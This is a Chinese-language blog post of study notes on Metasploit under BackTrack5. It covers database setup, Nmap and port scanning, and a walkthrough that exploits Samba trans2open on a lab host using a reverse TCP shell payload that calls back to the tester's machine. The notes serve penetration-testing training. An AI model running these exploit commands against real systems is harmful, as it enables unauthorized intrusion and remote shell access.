天天看點

BackTrack5 學習筆記9 Metasploit

本系列文章來自《高度安全環境下的進階滲透測試》一書學習筆記

Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識别安全性問題,驗證漏洞的緩解措施,并管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智能開發,代碼審計,Web應用程式掃描,社會工程。團隊合作,在Metasploit和綜合報告提出了他們的發現。Metasploit是一個免費的、可下載下傳的架構,通過它可以很容易地擷取、開發并對計算機軟體漏洞實施攻擊。它本身附帶數百個已知軟體漏洞的專業級漏洞攻擊工具。當H.D. Moore在2003年釋出Metasploit時,計算機安全狀況也被永久性地改變了。仿佛一夜之間,任何人都可以成為黑客,每個人都可以使用攻擊工具來攻擊那些未打過更新檔或者剛剛打過更新檔的漏洞。軟體廠商再也不能推遲釋出針對已公布漏洞的更新檔了,這是因為Metasploit團隊一直都在努力開發各種攻擊工具,并将它們貢獻給所有Metasploit使用者。

2009年10月21号,漏洞管了解決公司Rapid7收購Metasploit項目。Rapid7承諾成立專職開發團隊,仍然将源代碼置于3段式BSD許可證下。

——百度百科

線上教程:

​​​https://www.offensive-security.com/metasploit-unleashed/​​

更新Metasploit

msfupdate      

Metasploit和資料庫

Metasploit可以将所有的結果導入到資料庫中

下面是安裝postgre

apt-get install postgresql -y
sudo su postgres -c psql
postgres=# ALTER USER postgres WITH PASSWORD 'mypassword'
postgres=# \q

msfconsole
msf> db_connect postgres:[email protected]/pentester
msf> db_status
msf> hosts      

(沒能安裝成功postgre,抽時間再仔細看看)

在Metasploit裡調用Nmap進行掃描

在執行hosts指令地,為了獲得輸出顯示,我們可以使用Nmap進行快速掃描以收集一些資料。在msfconsole已啟動并和資料庫已經連接配接的情況下,可以在Metasploit裡直接進行Nmap掃描。

msf> db_nmap -nO -sTU -pT:22,80,111,139,443,32768,U:111,137,32768 192.168.75.14      

輸出結果會自動被添加到資料庫以友善以後的檢索。

現在運作hosts指令,可以看到目标系統已經添加到了PostgreSQL資料庫中。

msf> hosts
msf> services -p 443      
msf> use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp)> show options
msf auxiliary(tcp)> set RHOSTS 192.168.75.14 
RHOSTS設定為需要掃描的目标
msf auxiliary(tcp)> set PORTS 1-1024
端口範圍
msf auxiliary(tcp)> run
啟動掃描任務      
msfconsole
msf> db_connect postgres:[email protected]/pentester
msf> services      
msf> search samba
msf> us exploit/linux/samba/trans2open
msf exploit(trans2open) > info
msf> set RHOST 192.168.75.14
msf> show payloads
msf> set payload linux/x86/shell/reverse_tcp
msf> set LHOST 192.168.75.12
msf> set LPORT 2222
exploit
msf exploit(trans2open) > exploit
# mail
# 1